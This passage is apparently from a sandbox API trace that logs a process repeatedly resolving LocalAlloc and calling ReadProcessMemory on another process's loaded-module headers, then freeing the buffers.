[0037.989] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0037.990] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0037.990] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x4baf10 [0037.990] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefde200e0, lpBuffer=0x4baf10, nSize=0x18, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4baf10*, lpNumberOfBytesRead=0x0) returned 1 [0037.990] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0037.990] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0037.990] LocalAlloc (uFlags=0x40, uBytes=0x108) returned 0x4bad20 [0037.990] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefde200e0, lpBuffer=0x4bad20, nSize=0x108, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4bad20*, lpNumberOfBytesRead=0x0) returned 1 [0037.990] LocalFree (hMem=0x4baf10) returned 0x0 [0037.990] LocalFree (hMem=0x4bad20) returned 0x0 [0037.990] LocalFree (hMem=0x4b8320) returned 0x0 [0037.990] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x117aa0, lpBuffer=0x31fa60, nSize=0x68, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x31fa60*, lpNumberOfBytesRead=0x0) returned 1 [0037.991] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0037.991] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0037.991] LocalAlloc (uFlags=0x40, uBytes=0x16) returned 0x4baf10 [0037.991] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x1176b8, lpBuffer=0x4baf10, nSize=0x16, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4baf10*, lpNumberOfBytesRead=0x0) returned 1 [0037.991] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x76fd0000, lpBuffer=0x31f930, nSize=0x40, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x31f930*, lpNumberOfBytesRead=0x0) returned 1 [0037.991] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0037.991] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0037.991] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x4baf30 [0037.991] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x76fd00f8, lpBuffer=0x4baf30, nSize=0x18, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4baf30*, lpNumberOfBytesRead=0x0) returned 1 [0037.992] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0037.992] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0037.992] LocalAlloc (uFlags=0x40, uBytes=0x108) returned 0x4bad20 [0037.992] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x76fd00f8, lpBuffer=0x4bad20, nSize=0x108, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4bad20*, lpNumberOfBytesRead=0x0) returned 1 [0037.992] LocalFree (hMem=0x4baf30) returned 0x0 [0037.992] LocalFree (hMem=0x4bad20) returned 0x0 [0037.992] LocalFree (hMem=0x4baf10) returned 0x0 [0037.992] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x117b90, lpBuffer=0x31fa60, nSize=0x68, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x31fa60*, lpNumberOfBytesRead=0x0) returned 1 [0037.992] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0037.992] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0037.992] LocalAlloc (uFlags=0x40, uBytes=0x14) returned 0x4baf10 [0037.992] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x117708, lpBuffer=0x4baf10, nSize=0x14, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4baf10*, lpNumberOfBytesRead=0x0) returned 1 [0037.993] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefddb0000, lpBuffer=0x31f930, nSize=0x40, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x31f930*, lpNumberOfBytesRead=0x0) returned 1 [0037.993] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0037.993] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0037.993] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x4baf30 [0037.993] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefddb00f0, lpBuffer=0x4baf30, nSize=0x18, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4baf30*, lpNumberOfBytesRead=0x0) returned 1 [0037.993] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0037.993] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0037.993] LocalAlloc (uFlags=0x40, uBytes=0x108) returned 0x4bad20 [0037.993] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefddb00f0, lpBuffer=0x4bad20, nSize=0x108, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4bad20*, lpNumberOfBytesRead=0x0) returned 1 [0037.994] LocalFree (hMem=0x4baf30) returned 0x0 [0038.039] LocalFree (hMem=0x4bad20) returned 0x0 [0038.039] LocalFree (hMem=0x4baf10) returned 0x0 [0038.039] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x117c80, lpBuffer=0x31fa60, nSize=0x68, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x31fa60*, lpNumberOfBytesRead=0x0) returned 1 [0038.040] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0038.040] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0038.040] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x4baf10 [0038.040] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x1161c8, lpBuffer=0x4baf10, nSize=0x10, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4baf10*, lpNumberOfBytesRead=0x0) returned 1 [0038.040] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefe230000, lpBuffer=0x31f930, nSize=0x40, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x31f930*, lpNumberOfBytesRead=0x0) returned 1 [0038.040] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0038.040] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0038.041] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x4baf30 [0038.041] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefe2300e0, lpBuffer=0x4baf30, nSize=0x18, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4baf30*, lpNumberOfBytesRead=0x0) returned 1 [0038.041] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0038.041] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0038.041] LocalAlloc (uFlags=0x40, uBytes=0x108) returned 0x4bad20 [0038.041] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefe2300e0, lpBuffer=0x4bad20, nSize=0x108, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4bad20*, lpNumberOfBytesRead=0x0) returned 1 [0038.041] LocalFree (hMem=0x4baf30) returned 0x0 [0038.041] LocalFree (hMem=0x4bad20) returned 0x0 [0038.041] LocalFree (hMem=0x4baf10) returned 0x0 [0038.041] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x117dc0, lpBuffer=0x31fa60, nSize=0x68, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x31fa60*, lpNumberOfBytesRead=0x0) returned 1 [0038.042] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0038.042] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0038.042] LocalAlloc (uFlags=0x40, uBytes=0x14) returned 0x4baf10 [0038.042] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x117d98, lpBuffer=0x4baf10, nSize=0x14, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4baf10*, lpNumberOfBytesRead=0x0) returned 1 [0038.042] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefe090000, lpBuffer=0x31f930, nSize=0x40, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x31f930*, lpNumberOfBytesRead=0x0) returned 1 [0038.042] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0038.042] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0038.042] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x4baf30 [0038.042] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefe0900e0, lpBuffer=0x4baf30, nSize=0x18, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4baf30*, lpNumberOfBytesRead=0x0) returned 1 [0038.042] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0038.043] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0038.043] LocalAlloc (uFlags=0x40, uBytes=0x108) returned 0x4bad20 [0038.043] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefe0900e0, lpBuffer=0x4bad20, nSize=0x108, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4bad20*, lpNumberOfBytesRead=0x0) returned 1 [0038.043] LocalFree (hMem=0x4baf30) returned 0x0 [0038.043] LocalFree (hMem=0x4bad20) returned 0x0 [0038.043] LocalFree (hMem=0x4baf10) returned 0x0 [0038.043] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x118980, lpBuffer=0x31fa60, nSize=0x68, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x31fa60*, lpNumberOfBytesRead=0x0) returned 1 [0038.043] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0038.043] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0038.043] LocalAlloc (uFlags=0x40, uBytes=0x16) returned 0x4baf10 [0038.043] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x118958, lpBuffer=0x4baf10, nSize=0x16, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4baf10*, lpNumberOfBytesRead=0x0) returned 1 [0038.044] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefcbd0000, lpBuffer=0x31f930, nSize=0x40, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x31f930*, lpNumberOfBytesRead=0x0) returned 1 [0038.044] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0038.044] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0038.044] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x4baf30 [0038.044] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefcbd00f0, lpBuffer=0x4baf30, nSize=0x18, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4baf30*, lpNumberOfBytesRead=0x0) returned 1 [0038.044] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0038.044] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0038.044] LocalAlloc (uFlags=0x40, uBytes=0x108) returned 0x4bad20 [0038.044] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefcbd00f0, lpBuffer=0x4bad20, nSize=0x108, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4bad20*, lpNumberOfBytesRead=0x0) returned 1 [0038.045] LocalFree (hMem=0x4baf30) returned 0x0 [0038.045] LocalFree (hMem=0x4bad20) returned 0x0 [0038.045] LocalFree (hMem=0x4baf10) returned 0x0 [0038.045] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x119a70, lpBuffer=0x31fa60, nSize=0x68, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x31fa60*, lpNumberOfBytesRead=0x0) returned 1 [0038.045] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0038.045] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0038.045] LocalAlloc (uFlags=0x40, uBytes=0x1a) returned 0x4b8320 [0038.045] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x118b18, lpBuffer=0x4b8320, nSize=0x1a, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4b8320*, lpNumberOfBytesRead=0x0) returned 1 [0038.045] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefcbb0000, lpBuffer=0x31f930, nSize=0x40, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x31f930*, lpNumberOfBytesRead=0x0) returned 1 [0038.045] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0038.046] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0038.046] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x4bc150 [0038.046] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefcbb00e8, lpBuffer=0x4bc150, nSize=0x18, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4bc150*, lpNumberOfBytesRead=0x0) returned 1 [0038.046] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0038.046] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0038.046] LocalAlloc (uFlags=0x40, uBytes=0x108) returned 0x4bad20 [0038.046] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefcbb00e8, lpBuffer=0x4bad20, nSize=0x108, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4bad20*, lpNumberOfBytesRead=0x0) returned 1 [0038.046] LocalFree (hMem=0x4bc150) returned 0x0 [0038.046] LocalFree (hMem=0x4bad20) returned 0x0 [0038.046] LocalFree (hMem=0x4b8320) returned 0x0 [0038.046] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x119b90, lpBuffer=0x31fa60, nSize=0x68, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x31fa60*, lpNumberOfBytesRead=0x0) returned 1 [0038.047] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0038.047] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0038.047] LocalAlloc (uFlags=0x40, uBytes=0x16) returned 0x4bc150 [0038.047] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x118ac8, lpBuffer=0x4bc150, nSize=0x16, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4bc150*, lpNumberOfBytesRead=0x0) returned 1 [0038.047] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefd0c0000, lpBuffer=0x31f930, nSize=0x40, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x31f930*, lpNumberOfBytesRead=0x0) returned 1 [0038.047] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0038.047] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0038.047] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x4bc170 [0038.047] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefd0c00e0, lpBuffer=0x4bc170, nSize=0x18, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4bc170*, lpNumberOfBytesRead=0x0) returned 1 [0038.048] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0038.048] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0038.048] LocalAlloc (uFlags=0x40, uBytes=0x108) returned 0x4bad20 [0038.048] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefd0c00e0, lpBuffer=0x4bad20, nSize=0x108, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4bad20*, lpNumberOfBytesRead=0x0) returned 1 [0038.048] LocalFree (hMem=0x4bc170) returned 0x0 [0038.048] LocalFree (hMem=0x4bad20) returned 0x0 [0038.048] LocalFree (hMem=0x4bc150) returned 0x0 [0038.048] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x119c80, lpBuffer=0x31fa60, nSize=0x68, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x31fa60*, lpNumberOfBytesRead=0x0) returned 1 [0038.048] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0038.048] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0038.048] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x4bc150 [0038.048] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x118bb8, lpBuffer=0x4bc150, nSize=0x18, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4bc150*, lpNumberOfBytesRead=0x0) returned 1 [0038.049] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefcb40000, lpBuffer=0x31f930, nSize=0x40, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x31f930*, lpNumberOfBytesRead=0x0) returned 1 [0038.049] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0038.049] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0038.049] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x4bc170 [0038.049] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefcb400f0, lpBuffer=0x4bc170, nSize=0x18, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4bc170*, lpNumberOfBytesRead=0x0) returned 1 [0038.049] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0038.049] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0038.049] LocalAlloc (uFlags=0x40, uBytes=0x108) returned 0x4bad20 [0038.049] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefcb400f0, lpBuffer=0x4bad20, nSize=0x108, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4bad20*, lpNumberOfBytesRead=0x0) returned 1 [0038.049] LocalFree (hMem=0x4bc170) returned 0x0 [0038.050] LocalFree (hMem=0x4bad20) returned 0x0 [0038.050] LocalFree (hMem=0x4bc150) returned 0x0 [0038.050] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x119d70, lpBuffer=0x31fa60, nSize=0x68, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x31fa60*, lpNumberOfBytesRead=0x0) returned 1 [0038.050] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0038.050] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0038.050] LocalAlloc (uFlags=0x40, uBytes=0x14) returned 0x4bc150 [0038.050] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x118b68, lpBuffer=0x4bc150, nSize=0x14, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4bc150*, lpNumberOfBytesRead=0x0) returned 1 [0038.050] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefe160000, lpBuffer=0x31f930, nSize=0x40, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x31f930*, lpNumberOfBytesRead=0x0) returned 1 [0038.050] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0038.050] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0038.050] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x4bc170 [0038.050] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefe1600f0, lpBuffer=0x4bc170, nSize=0x18, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4bc170*, lpNumberOfBytesRead=0x0) returned 1 [0038.050] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0038.050] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0038.050] LocalAlloc (uFlags=0x40, uBytes=0x108) returned 0x4bad20 [0038.051] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefe1600f0, lpBuffer=0x4bad20, nSize=0x108, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4bad20*, lpNumberOfBytesRead=0x0) returned 1 [0038.051] LocalFree (hMem=0x4bc170) returned 0x0 [0038.051] LocalFree (hMem=0x4bad20) returned 0x0 [0038.051] LocalFree (hMem=0x4bc150) returned 0x0 [0038.051] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x119e60, lpBuffer=0x31fa60, nSize=0x68, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x31fa60*, lpNumberOfBytesRead=0x0) returned 1 [0038.051] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0038.051] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0038.051] LocalAlloc (uFlags=0x40, uBytes=0x14) returned 0x4bc150 [0038.051] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x118c08, lpBuffer=0x4bc150, nSize=0x14, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4bc150*, lpNumberOfBytesRead=0x0) returned 1 [0038.051] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefd910000, lpBuffer=0x31f930, nSize=0x40, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x31f930*, lpNumberOfBytesRead=0x0) returned 1 [0038.051] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0038.051] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0038.051] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x4bc170 [0038.051] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefd9100f0, lpBuffer=0x4bc170, nSize=0x18, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4bc170*, lpNumberOfBytesRead=0x0) returned 1 [0038.052] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0038.052] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0038.052] LocalAlloc (uFlags=0x40, uBytes=0x108) returned 0x4bad20 [0038.052] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefd9100f0, lpBuffer=0x4bad20, nSize=0x108, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4bad20*, lpNumberOfBytesRead=0x0) returned 1 [0038.052] LocalFree (hMem=0x4bc170) returned 0x0 [0038.052] LocalFree (hMem=0x4bad20) returned 0x0 [0038.052] LocalFree (hMem=0x4bc150) returned 0x0 [0038.052] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x119f50, lpBuffer=0x31fa60, nSize=0x68, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x31fa60*, lpNumberOfBytesRead=0x0) returned 1 [0038.052] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0038.052] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0038.053] LocalAlloc (uFlags=0x40, uBytes=0x1a) returned 0x4b8320 [0038.053] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x119068, lpBuffer=0x4b8320, nSize=0x1a, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4b8320*, lpNumberOfBytesRead=0x0) returned 1 [0038.053] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefcb30000, lpBuffer=0x31f930, nSize=0x40, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x31f930*, lpNumberOfBytesRead=0x0) returned 1 [0038.053] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0038.053] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0038.053] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x4bc150 [0038.053] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefcb300e8, lpBuffer=0x4bc150, nSize=0x18, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4bc150*, lpNumberOfBytesRead=0x0) returned 1 [0038.053] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0038.053] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0038.053] LocalAlloc (uFlags=0x40, uBytes=0x108) returned 0x4bad20 [0038.053] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefcb300e8, lpBuffer=0x4bad20, nSize=0x108, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4bad20*, lpNumberOfBytesRead=0x0) returned 1 [0038.053] LocalFree (hMem=0x4bc150) returned 0x0 [0038.053] LocalFree (hMem=0x4bad20) returned 0x0 [0038.053] LocalFree (hMem=0x4b8320) returned 0x0 [0038.053] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x11a040, lpBuffer=0x31fa60, nSize=0x68, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x31fa60*, lpNumberOfBytesRead=0x0) returned 1 [0038.054] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0038.054] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0038.054] LocalAlloc (uFlags=0x40, uBytes=0x14) returned 0x4bc150 [0038.054] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x1190b8, lpBuffer=0x4bc150, nSize=0x14, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4bc150*, lpNumberOfBytesRead=0x0) returned 1 [0038.054] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefcb00000, lpBuffer=0x31f930, nSize=0x40, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x31f930*, lpNumberOfBytesRead=0x0) returned 1 [0038.054] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0038.054] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0038.054] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x4bc170 [0038.054] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefcb000f0, lpBuffer=0x4bc170, nSize=0x18, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4bc170*, lpNumberOfBytesRead=0x0) returned 1 [0038.054] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0038.054] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0038.054] LocalAlloc (uFlags=0x40, uBytes=0x108) returned 0x4bad20 [0038.054] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefcb000f0, lpBuffer=0x4bad20, nSize=0x108, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4bad20*, lpNumberOfBytesRead=0x0) returned 1 [0038.054] LocalFree (hMem=0x4bc170) returned 0x0 [0038.054] LocalFree (hMem=0x4bad20) returned 0x0 [0038.055] LocalFree (hMem=0x4bc150) returned 0x0 [0038.055] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x11a130, lpBuffer=0x31fa60, nSize=0x68, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x31fa60*, lpNumberOfBytesRead=0x0) returned 1 [0038.055] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0038.055] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0038.055] LocalAlloc (uFlags=0x40, uBytes=0x16) returned 0x4bc150 [0038.055] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x118e38, lpBuffer=0x4bc150, nSize=0x16, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4bc150*, lpNumberOfBytesRead=0x0) returned 1 [0038.055] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefcab0000, lpBuffer=0x31f930, nSize=0x40, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x31f930*, lpNumberOfBytesRead=0x0) returned 1 [0038.055] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0038.055] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0038.055] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x4bc170 [0038.055] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefcab00f0, lpBuffer=0x4bc170, nSize=0x18, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4bc170*, lpNumberOfBytesRead=0x0) returned 1 [0038.056] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0038.056] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0038.056] LocalAlloc (uFlags=0x40, uBytes=0x108) returned 0x4bad20 [0038.056] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefcab00f0, lpBuffer=0x4bad20, nSize=0x108, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4bad20*, lpNumberOfBytesRead=0x0) returned 1 [0038.056] LocalFree (hMem=0x4bc170) returned 0x0 [0038.056] LocalFree (hMem=0x4bad20) returned 0x0 [0038.056] LocalFree (hMem=0x4bc150) returned 0x0 [0038.056] 